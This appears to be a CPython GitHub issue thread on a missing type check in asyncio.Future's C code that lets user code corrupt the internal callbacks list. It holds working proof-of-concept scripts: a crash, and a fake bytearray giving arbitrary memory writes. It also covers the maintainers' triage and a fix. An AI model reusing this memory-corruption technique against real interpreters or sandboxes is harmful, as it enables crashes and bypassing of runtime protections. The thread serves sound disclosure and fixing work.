Lack of type checks in asyncio.Future can cause crash or the ability to craft malicious objects
Crash report
What happened?
In Modules/_asynciomodule.c the _asyncio_Future_remove_done_callback_impl function has a section where it retrieves an item from a list and then immediately assumes it's a tuple without doing any checks (this issue also exists in future_schedule_callbacks, but I'll only go over this one for brevity).
static PyObject *
_asyncio_Future_remove_done_callback_impl(FutureObj *self, PyTypeObject *cls,
                                          PyObject *fn)
/*[clinic end generated code: output=2da35ccabfe41b98 input=c7518709b86fc747]*/
{
    /* code not relevant to the bug ... */
    // Beware: PyObject_RichCompareBool below may change fut_callbacks.
    // See GH-97592.
    for (i = 0;
         self->fut_callbacks != NULL && i < PyList_GET_SIZE(self->fut_callbacks);
         i++) {
        int ret;
        PyObject *item = PyList_GET_ITEM(self->fut_callbacks, i);
        Py_INCREF(item);
        ret = PyObject_RichCompareBool(PyTuple_GET_ITEM(item, 0), fn, Py_EQ);
        if (ret == 0) {
            if (j < len) {
                PyList_SET_ITEM(newlist, j, item);
                j++;
                continue;
            }
            ret = PyList_Append(newlist, item);
        }
        Py_DECREF(item);
        if (ret < 0) {
            goto fail;
        }
    }
    /* code not relevant to the bug ... */
}
We can see that it gets item i from fut_callbacks and then immediately treats it as a tuple without any checks. This would be fine if the user had no way to control fut_callbacks, but the Future object has a _callbacks attribute which uses FutureObj_get_callbacks as its getter:
static PyObject *
FutureObj_get_callbacks(FutureObj *fut, void *Py_UNUSED(ignored))
{
    asyncio_state *state = get_asyncio_state_by_def((PyObject *)fut);
    Py_ssize_t i;
    ENSURE_FUTURE_ALIVE(state, fut)
    if (fut->fut_callback0 == NULL) {
        if (fut->fut_callbacks == NULL) {
            Py_RETURN_NONE;
        }
        return Py_NewRef(fut->fut_callbacks);
    }
    /* code to copy the callbacks list and return it */
}
In the rare case that fut_callback0 is NULL and fut_callbacks isn't, this will actually return the real reference to fut_callbacks allowing us to modify the items in the list to be whatever we want. Here's a short POC to showcase a crash caused by this bug.
import asyncio

fut = asyncio.Future()

class Evil:
    def __eq__(self, other):
        global real_ref
        real_ref = fut._callbacks

pad = lambda: ...
fut.add_done_callback(pad)     # sets fut->fut_callback0
fut.add_done_callback(Evil())  # sets first item in fut->fut_callbacks list

# Removes the callback from fut->fut_callback0, setting it to NULL, but the rest of the
# function checks the other callbacks, which can call back into our Python code,
# i.e. our `__eq__` method. That lets us retrieve a real reference to fut->fut_callbacks,
# since fut_callback0 == NULL and fut_callbacks != NULL.
fut.remove_done_callback(pad)

real_ref[0] = 0xDEADC0DE

# remove_done_callback will traverse all the callbacks in fut->fut_callbacks,
# meaning it will assume our 0xDEADC0DE int is a tuple and crash
fut.remove_done_callback(pad)
And if done carefully, this can be used to craft a malicious bytearray object that can write anywhere in memory. Here's an example that works on 64-bit systems (tested on Windows and Linux):
import asyncio

fut = asyncio.Future()

class Evil:
    # could split this into 2 different classes so one does the real_ref grab
    # and the other does the mem set, but that's boring
    def __eq__(self, other):
        global real_ref, mem
        if self is e:
            real_ref = fut._callbacks
        else:
            mem = other
        return False

e = Evil()
pad = lambda: ...
fut.add_done_callback(pad)  # sets fut->fut_callback0
fut.add_done_callback(e)    # sets first item in fut->fut_callbacks list

# Removes the callback from fut->fut_callback0, setting it to NULL, but the rest of the
# function checks the other callbacks, which can call back into our Python code,
# i.e. our `__eq__` method. That lets us retrieve a real reference to fut->fut_callbacks,
# since fut_callback0 == NULL and fut_callbacks != NULL.
fut.remove_done_callback(pad)

# set up fake bytearray obj
fake = (
    (0x123456).to_bytes(8, 'little') +
    id(bytearray).to_bytes(8, 'little') +
    (2**63 - 1).to_bytes(8, 'little') +
    (0).to_bytes(24, 'little')
)

# remove_done_callback will interpret this as a tuple, so it'll grab our fake obj instead
i2f = lambda num: 5e-324 * num
real_ref[0] = complex(0, i2f(id(fake) + bytes.__basicsize__ - 1))

# remove_done_callback will traverse all the callbacks in fut->fut_callbacks looking for
# this obj, which will trigger our evil `__eq__`, giving us our fake obj
fut.remove_done_callback(Evil())

# done
if "mem" not in globals():
    print("Failed")
    exit()

# should be an absurd number like 0x7fffffffffffffff
print(hex(len(mem)))
mem[id(250) + int.__basicsize__] = 100
print(250) # => 100
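The `i2f` helper in the script above relies on a floating-point detail that is easy to miss: `5e-324` is the smallest positive subnormal double, whose raw bit pattern is the integer 1, so multiplying it by an integer below 2**53 should give a double whose raw 64 bits equal that integer. Here's a small sketch that checks this with `struct`. The name `float_bits` and the sample values are made up for illustration and are not part of the exploit.

```python
import struct

def i2f(num):
    # Same helper as in the report: scale the smallest subnormal double.
    return 5e-324 * num

def float_bits(value):
    # Reinterpret the 8 bytes of a double as an unsigned 64-bit integer.
    return struct.unpack("<Q", struct.pack("<d", value))[0]

# Illustrative address-sized values (assumed to be below 2**53).
samples = [1, 0x1000, 0x7F0012345678, 2**52 - 1]
round_trips = [float_bits(i2f(n)) == n for n in samples]
print(round_trips)
```

As far as I can tell from the object layouts on the tested 64-bit builds, the imaginary part of a complex object sits at the same offset where a tuple stores its first item pointer, which is why the value is wrapped in `complex(0, ...)` before being placed in the list.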
This can be fixed by making it impossible to get a real reference to the fut->fut_callbacks list, or just doing proper type checking in places where it's used.
CPython versions tested on:
3.11, 3.12, 3.13
Operating systems tested on:
Linux, Windows
Output from running 'python -VV' on the command line:
No response
Linked PRs
- gh-125833
- gh-125922
You can get the real reference to the callbacks list with something as simple as this; there's no need for the evil class I used in the initial report:
import asyncio

fut = asyncio.Future()
pad = lambda: ...
fut.add_done_callback(pad)          # sets fut->fut_callback0
fut.add_done_callback(lambda x: 1)  # sets first item in fut->fut_callbacks list

# removes callback from fut->fut_callback0 setting it to NULL
fut.remove_done_callback(pad)

for _ in range(10):
    # will always be the same since it's now returning the real ref
    print(hex(id(fut._callbacks)))
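A variant of the same check that doesn't depend on reading ids is to compare two reads of `_callbacks` with `is`. This is only a sketch: the function name `callbacks_getter_aliases` is made up, and it creates its own event loop (an assumption on my part) so it doesn't rely on a current loop being set. On an interpreter where the getter always copies, I'd expect it to report False. With the pure-Python Future, `_callbacks` is a plain attribute, so True there is not by itself a sign of this bug.

```python
import asyncio

def callbacks_getter_aliases():
    # Use an explicit loop so the sketch does not depend on a "current" loop.
    loop = asyncio.new_event_loop()
    try:
        fut = loop.create_future()
        pad = lambda f: None
        fut.add_done_callback(pad)             # first callback slot
        fut.add_done_callback(lambda f: None)  # goes into the callbacks list
        fut.remove_done_callback(pad)          # clears the first slot
        first = fut._callbacks
        second = fut._callbacks
        # True means both reads returned the very same list object.
        return first is second
    finally:
        loop.close()

aliased = callbacks_getter_aliases()
print("getter returns the same list object:", aliased)
```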
(As you observed) I don't think you necessarily need to get the real reference since you can just access it directly using fut._callbacks (being able to set it in the evil class means that you have access to the fut object itself).
You probably still need the evil class just to be able to corrupt the interpreter's state though:
import asyncio

fut = asyncio.Future()

class evil:
    def __eq__(self, other):
        global mem
        mem = other
        return False

cb_pad = lambda: ...
fut.add_done_callback(cb_pad)
fut.add_done_callback(evil())
fut.remove_done_callback(cb_pad)

fake = (
    (0x123456).to_bytes(8, 'little') +
    id(bytearray).to_bytes(8, 'little') +
    (2 ** 63 - 1).to_bytes(8, 'little') +
    (0).to_bytes(24, 'little')
)

i2f = lambda num: 5e-324 * num
fut._callbacks[0] = complex(0, i2f(id(fake) + bytes.__basicsize__ - 1))
fut.remove_done_callback(evil())

mem[id(250) + int.__basicsize__] = 100
assert 250 == 100
By the way, we decided not to categorize this as a security issue because of the capabilities an adversary would need to make it work (hence the fix will only be backported as far as 3.12, not all the way to 3.9):
- First, you need to find code that adds and removes callbacks in a specific manner.
- Second, you need that code to somehow access a private attribute and let you inject your payload.
@Nico-Posada If I'm missing something here or misunderstood your write-up, please enlighten me. AFAICT, the goal is to get some writable memory, yet this requires playing with fut._callbacks directly at some point on the victim's machine, right?
Yeah, I never intended for it to be labeled as a security bug, since you can do much more malicious things with the ability to execute arbitrary Python code. The only other possible issue would be using it to bypass audit hooks, but that would require the original program to have already imported asyncio so that it can be snagged from sys.modules.
The core problem here is an edge case in which the C implementation doesn't return a copy of the callbacks list; the user can then mutate the internal list and crash the interpreter, or worse. This doesn't qualify as a security issue, as the user needs code that mutates the list in a specific order and "messes" around with the private '_callbacks' attribute.
The fix I propose is to always return a copy of the callbacks in the C implementation, so that internal code need not be concerned about user code mutating the list of callbacks. Fix at #125922
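To illustrate the idea of always returning a copy, here's a toy pure-Python model. It is not the real C code: `ModelFuture`, `_callback0` and `_callback_list` are hypothetical names that only mimic the fut_callback0 / fut_callbacks split described in this issue, and the add/remove logic is simplified.

```python
class ModelFuture:
    """Toy stand-in for the C FutureObj; not the real implementation."""

    def __init__(self):
        self._callback0 = None      # models fut->fut_callback0
        self._callback_list = None  # models fut->fut_callbacks

    def add_done_callback(self, fn, context=None):
        if self._callback0 is None and self._callback_list is None:
            self._callback0 = (fn, context)
        else:
            if self._callback_list is None:
                self._callback_list = []
            self._callback_list.append((fn, context))

    def remove_done_callback(self, fn):
        removed = 0
        if self._callback0 is not None and self._callback0[0] == fn:
            self._callback0 = None
            removed += 1
        if self._callback_list is not None:
            kept = [item for item in self._callback_list if item[0] != fn]
            removed += len(self._callback_list) - len(kept)
            self._callback_list = kept or None
        return removed

    @property
    def _callbacks(self):
        if self._callback0 is None and self._callback_list is None:
            return None
        result = []
        if self._callback0 is not None:
            result.append(self._callback0)
        if self._callback_list is not None:
            result.extend(self._callback_list)
        return result  # always a fresh list, never the internal one


fut = ModelFuture()
pad = lambda: ...
other = lambda: ...
fut.add_done_callback(pad)
fut.add_done_callback(other)
fut.remove_done_callback(pad)   # the state that used to expose the real list

snapshot = fut._callbacks
snapshot[0] = 0xDEADC0DE        # corrupts only the copy
still_intact = fut._callbacks == [(other, None)]
print(still_intact)
```

With a getter like this, writing a non-tuple into the returned list never reaches the internal storage, so the code that walks the internal list can keep assuming it only contains tuples.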